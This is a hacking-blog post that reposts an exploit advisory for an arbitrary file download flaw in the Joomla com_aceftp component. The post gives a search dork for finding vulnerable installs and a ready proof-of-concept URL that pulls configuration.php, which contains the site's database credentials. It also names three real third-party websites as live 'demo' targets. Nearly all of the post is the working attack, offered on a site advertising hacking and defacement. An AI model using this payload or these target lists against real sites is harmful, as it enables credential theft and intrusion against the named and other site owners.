Joomla com aceftp Arbitrary File Download Vulnerability - cowok tersakiti team

Latest

TUTORIAL,HACKING,DEFACE,BLOGGER,ANALIST,ARTICLES,NEWS

BANNER 728X90

Wednesday, March 1, 2017

Joomla com aceftp Arbitrary File Download Vulnerability



##


##############################################################
# Exploit Title: Joomla com aceftp Arbitrary File Download Vulnerability
# Exploit Author: howucan
# Website : http://howucan.gr
# Dork : inurl:/administrator/components/com_aceftp/
# Software Website : http://www.joomace.net/downloads/aceftp
# Version : ALL
# Date : 2016/08/15
# Tested on : Parrot Os 3.1
# Category: webapps

#
########################
# Description :
#
# AceFTP is a smart, fast and lightweight file manager component. It
# operates from Joomla back-end so you don't have to use any FTP program
anymore.
########################
# POC :
#
#
http://localhost/path//administrator/components/com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
##############
# Demo1 :
www.iraqcoc.ir/administrator/components/com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
# Demo2 :
www.diethneis-sxeseis.gr/site/administrator/components/
com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
# Demo3 :
www.rederural.pt/administrator/components/com_aceftp/quixplorer/
index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
#
################################
#
# PAOK G4 Salonika Punk Rock City
################################

No comments:

Post a Comment